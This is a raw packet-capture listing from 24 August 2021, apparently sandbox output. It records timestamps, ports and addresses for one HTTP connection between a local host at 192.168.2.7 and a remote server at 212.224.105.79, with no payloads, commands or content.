Aug 24, 2021 08:46:53.751137018 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753541946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753570080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753587008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753607035 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753613949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753623962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753640890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753650904 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753657103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753673077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753689051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753690958 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753709078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753710985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753727913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753739119 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753746986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753765106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753774881 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753781080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753797054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753813028 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753813028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753829002 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753844976 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753849030 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753859997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753865957 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753880024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753897905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753899097 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753912926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753930092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753943920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753945112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753961086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753977060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.753983021 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.753992081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754009962 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.754010916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754029036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754035950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.754044056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754060984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754076958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754082918 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.754092932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754113913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754126072 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754132032 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.754138947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754156113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754158020 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.754172087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754179955 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.754189014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754204988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.754205942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.754235983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.756068945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.756098032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.756114960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.756129026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.756156921 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.764204979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764230967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764246941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764264107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764278889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764298916 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764312983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.764316082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764333963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764347076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764358044 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.764377117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.764384985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.764431000 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.767041922 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.769825935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.773216009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.773238897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.773257971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.773276091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.773292065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.773305893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.773384094 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776150942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776173115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776185036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776197910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776210070 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776222944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776233912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776247025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776256084 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776258945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776271105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776278973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776283026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776295900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776308060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776319981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776326895 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776331902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776345015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776345015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776356936 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776370049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776371002 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776381969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776393890 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776395082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776407003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776420116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776427031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776444912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776446104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776459932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776477098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776493073 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776501894 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776504993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776516914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776530027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776537895 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776541948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776554108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776559114 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776566982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776578903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776591063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776602983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776612043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776616096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776629925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776639938 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776642084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.776670933 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.776696920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.778141022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.778162003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.778175116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.778187037 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.778199911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.778220892 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.778270006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.778285980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.786365032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786391973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786405087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786422014 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786438942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786494970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.786537886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786542892 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.786556005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786576986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.786624908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786642075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786662102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.786663055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.786715984 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.789129019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.789155960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.789227962 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.795384884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.795412064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.795428038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.795444012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.795461893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.795475960 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.795538902 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.798783064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798808098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798827887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798845053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798863888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798866987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.798876047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798892021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798913002 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.798926115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798938990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798943043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.798954964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798973083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798989058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.798993111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799009085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799026966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799030066 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799042940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799060106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799076080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799081087 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799093008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799108982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799134016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799141884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799143076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799159050 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799175024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799175024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799190998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799206972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799220085 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799222946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799238920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799257994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799257994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799274921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799292088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799299955 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799309015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799324989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799333096 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799340963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799357891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799372911 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799391985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799391985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.799408913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.799439907 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.800180912 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.800204039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.800221920 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.800235987 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.800237894 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.800255060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.800261974 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.800302982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.808584929 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808609962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808625937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808645964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808660984 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.808662891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808679104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808691978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.808695078 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808712006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808727026 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.808728933 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808753967 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.808763027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.808820963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.811220884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.811245918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.811261892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.811278105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.811294079 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.811358929 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.811403990 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.817514896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.817543983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.817563057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.817581892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.817599058 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.817634106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.817661047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821423054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821449995 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821468115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821484089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821580887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821580887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821597099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821614027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821631908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821645021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821655035 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821680069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821696997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821706057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821718931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821736097 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821751118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821765900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821783066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821791887 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821800947 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821818113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821819067 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821834087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821850061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821858883 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821866989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821882010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821901083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821914911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821918011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821933985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821954012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821969986 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.821976900 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.821986914 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822000027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.822002888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822019100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822041988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822041988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.822060108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822074890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822092056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822101116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.822108030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822128057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822177887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822189093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.822199106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822215080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822232008 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.822365046 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.830848932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.830876112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.830895901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.830914021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.830930948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.830945015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.830957890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.830966949 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.830976009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.830992937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.831017017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.831026077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.831048012 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.831087112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.833497047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.833518028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.833537102 CEST	80	49715	212.224.105.79	192.168.2.7
